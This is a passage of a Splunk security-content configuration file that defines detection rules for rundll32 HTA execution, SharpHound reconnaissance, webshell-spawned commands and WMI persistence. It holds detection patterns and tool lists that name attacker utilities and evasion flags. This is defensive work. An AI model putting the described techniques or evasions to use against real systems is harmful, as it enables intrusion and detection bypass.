to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive. action.escu.creation_date = 2021-01-20 action.escu.modification_date = 2021-01-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Rundll32 Inline HTA Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious MSHTA Activity", "NOBELIUM Group", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Suspicious rundll32.exe inline HTA execution on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Rundll32 Inline HTA Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "NOBELIUM Group", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process. action.notable.param.rule_title = Detect Rundll32 Inline HTA Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_rundll32_inline_hta_execution_filter` [ESCU - Detect SharpHound Command-Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies common command-line arguments used by SharpHound `-collectionMethod` and `invoke-bloodhound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies common command-line arguments used by SharpHound `-collectionMethod` and `invoke-bloodhound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as the arguments used are specific to SharpHound. Filter as needed or add more command-line arguments as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect SharpHound Command-Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Possible SharpHound command-Line arguments identified on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect SharpHound Command-Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies common command-line arguments used by SharpHound `-collectionMethod` and `invoke-bloodhound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.notable.param.rule_title = Detect SharpHound Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*-collectionMethod*","*invoke-bloodhound*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_command_line_arguments_filter` [ESCU - Detect SharpHound File Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on file modifications that include the name of the process, and file, responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = False positives should be limited as the analytic is specific to a filename with extension .zip. Filter as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect SharpHound File Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Potential SharpHound file modifications identified on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect SharpHound File Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.notable.param.rule_title = Detect SharpHound File Modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*bloodhound.zip", "*_computers.json", "*_gpos.json", "*_domains.json", "*_users.json", "*_groups.json", "*_ous.json", "*_containers.json") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter` [ESCU - Detect SharpHound Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited as this is specific to a file attribute not used by anything else. Filter as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect SharpHound Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Potential SharpHound binary identified on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect SharpHound Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies SharpHound binary usage by using the original filena,e. In addition to renaming the PE, other coverage is available to detect command-line arguments. This particular analytic looks for the original_file_name of `SharpHound.exe` and the process name. It is possible older instances of SharpHound.exe have different original filenames. Dependent upon the operator, the code may be re-compiled and the attributes removed or changed to anything else. During triage, review the metadata of the binary in question. Review parallel processes for suspicious behavior. Identify the source of this binary. action.notable.param.rule_title = Detect SharpHound Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sharphound.exe OR Processes.original_file_name=SharpHound.exe) by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_usage_filter` [ESCU - Detect suspicious processnames using pretrained model in DSDL - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic uses a pre-trained Deep Learning model to predict whether a processname is suspicious or not. Malwares and malicious programs such as ransomware often use tactics, techniques, and procedures (TTPs) such as copying malicious files to the local machine to propagate themselves across the network. A key indicator of compromise is that after a successful execution of the malware, it copies itself as an executable file with a randomly generated filename and places this file in one of the directories. Such techniques are seen in several malwares such as TrickBot. We develop machine learning model that uses a Recurrent Neural Network (RNN) to distinguish between malicious and benign processnames. The model is trained independently and is then made available for download. We use a character level RNN to classify malicious vs. benign processnames. The higher is_malicious_prob, the more likely is the processname to be suspicious (between [0,1]). The threshold for flagging a processname as suspicious is set as 0.5. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic uses a pre-trained Deep Learning model to predict whether a processname is suspicious or not. Malwares and malicious programs such as ransomware often use tactics, techniques, and procedures (TTPs) such as copying malicious files to the local machine to propagate themselves across the network. A key indicator of compromise is that after a successful execution of the malware, it copies itself as an executable file with a randomly generated filename and places this file in one of the directories. Such techniques are seen in several malwares such as TrickBot. We develop machine learning model that uses a Recurrent Neural Network (RNN) to distinguish between malicious and benign processnames. The model is trained independently and is then made available for download. We use a character level RNN to classify malicious vs. benign processnames. The higher is_malicious_prob, the more likely is the processname to be suspicious (between [0,1]). The threshold for flagging a processname as suspicious is set as 0.5. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if a suspicious processname is similar to a benign processname. action.escu.creation_date = 2023-01-23 action.escu.modification_date = 2023-01-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect suspicious processnames using pretrained model in DSDL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Command-Line Executions"] action.risk = 1 action.risk.param._risk_message = The process $process$ is running from an unusual place by $user$ on $dest$ with a processname that appears to be randomly generated. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect suspicious processnames using pretrained model in DSDL - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Command-Line Executions"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name Processes.parent_process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name(Processes)` | rename process_name as text | fields text, parent_process_name, process, user, dest | apply detect_suspicious_processnames_using_pretrained_model_in_dsdl | rename predicted_label as is_suspicious_score | rename text as process_name | where is_suspicious_score > 0.5 | `detect_suspicious_processnames_using_pretrained_model_in_dsdl_filter` [ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This detection may also be triggered by legitimate applications and numerous service accounts, which often end with a $ sign. To manage this, it's advised to check the service account's activities and, if they are valid, modify the filter macro to exclude them. action.escu.creation_date = 2023-12-07 action.escu.modification_date = 2023-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Emotet Malware DHS Report TA18-201A", "Suspicious Command-Line Executions", "Azorult"] action.risk = 1 action.risk.param._risk_message = cmd.exe launching script interpreters $process_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Use of cmd exe to Launch Script Interpreters - Rule action.correlationsearch.annotations = {"analytic_story": ["Emotet Malware DHS Report TA18-201A", "Suspicious Command-Line Executions", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine action.notable.param.rule_title = Detect Use of cmd exe to Launch Script Interpreters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe" (Processes.process_name=cscript.exe OR Processes.process_name =wscript.exe) by Processes.parent_process Processes.process_name Processes.process Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `detect_use_of_cmd_exe_to_launch_script_interpreters_filter` [ESCU - Detect Webshell Exploit Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate OS functions called by vendor applications, baseline the environment and filter before enabling. Recommend throttle by dest/process_name action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Webshell Exploit Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Citrix ShareFile RCE CVE-2023-24489", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"] action.risk = 1 action.risk.param._risk_message = Webshell Exploit Behavior - $parent_process_name$ spawned $process_name$ on $dest$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Webshell Exploit Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", "CISA AA22-264A", "Citrix ShareFile RCE CVE-2023-24489", "Flax Typhoon", "WS FTP Server Critical Vulnerabilities", "SysAid On-Prem Software CVE-2023-47246 Vulnerability"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1505", "T1505.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect the abuse of web applications by adversaries. Adversaries may install a backdoor or script onto web servers by exploiting known vulnerabilities or misconfigruations. Web shells are used to establish persistent access to systems and provide a set of executable functions or a command-line interface on the system hosting the Web server. action.notable.param.rule_title = Detect Webshell Exploit Behavior action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time) as firstTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("arp.exe","at.exe","bash.exe","bitsadmin.exe","certutil.exe","cmd.exe","cscript.exe", "dsget.exe","dsquery.exe","find.exe","findstr.exe","fsutil.exe","hostname.exe","ipconfig.exe","ksh.exe","nbstat.exe", "net.exe","net1.exe","netdom.exe","netsh.exe","netstat.exe","nltest.exe","nslookup.exe","ntdsutil.exe","pathping.exe", "ping.exe","powershell.exe","pwsh.exe","qprocess.exe","query.exe","qwinsta.exe","reg.exe","rundll32.exe","sc.exe", "scrcons.exe","schtasks.exe","sh.exe","systeminfo.exe","tasklist.exe","tracert.exe","ver.exe","vssadmin.exe", "wevtutil.exe","whoami.exe","wmic.exe","wscript.exe","wusa.exe","zsh.exe") AND Processes.parent_process_name IN ("w3wp.exe", "http*.exe", "nginx*.exe", "php*.exe", "php-cgi*.exe","tomcat*.exe")) by Processes.dest,Processes.user,Processes.parent_process,Processes.parent_process_name,Processes.process,Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_webshell_exploit_behavior_filter` [ESCU - Detect WMI Event Subscription Persistence - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\ All event subscriptions have three components \ 1. Filter - WQL Query for the events we want. EventID equals 19 \ 1. Consumer - An action to take upon triggering the filter. EventID equals 20 \ 1. Binding - Registers a filter to a consumer. EventID equals 21 \ Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.003", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\ All event subscriptions have three components \ 1. Filter - WQL Query for the events we want. EventID equals 19 \ 1. Consumer - An action to take upon triggering the filter. EventID equals 20 \ 1. Binding - Registers a filter to a consumer. EventID equals 21 \ Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with that provide WMI Event Subscription from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA and have enabled EventID 19, 20 and 21. Tune and filter known good to limit the volume. action.escu.known_false_positives = It is possible some applications will create a consumer and may be required to be filtered. For tuning, add any additional LOLBin's for further depth of coverage. action.escu.creation_date = 2021-06-16 action.escu.modification_date = 2021-06-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect WMI Event Subscription Persistence - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = Possible malicious WMI Subscription created on $dest$ action.risk.param._risk = 